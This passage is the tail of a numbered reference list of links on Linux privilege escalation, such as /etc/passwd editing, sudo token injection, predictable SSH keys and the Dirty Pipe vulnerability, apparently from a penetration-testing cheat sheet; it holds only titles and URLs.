MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) 872 * [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) 873 874 * [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) 875 * [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) 876 * [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) 877 * [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/) 878 * [Setting the root password in preseed.cfg for unattended installation - Sebest - Mar 31, 2010](https://sebest.github.io/post/setting-the-root-password-in-preseed-cfg-for-unattended-installation/)